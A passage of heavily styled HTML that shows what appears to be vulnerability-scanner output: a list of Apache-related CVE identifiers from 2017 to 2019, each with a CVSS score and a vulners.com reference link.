Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7668</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7.5</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-7668</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3169</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7.5</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-3169</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3167</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7.5</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-3167</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0211</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7.2</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-0211</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2018</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1312</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6.8</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2018-1312</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">15715</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6.8</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-15715</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">10082</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6.4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-10082</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">9788</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6.4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-9788</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0217</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-0217</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">10098</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.8</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-10098</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">10081</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-10081</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0220</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-0220</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0196</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-0196</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2018</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">17199</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; 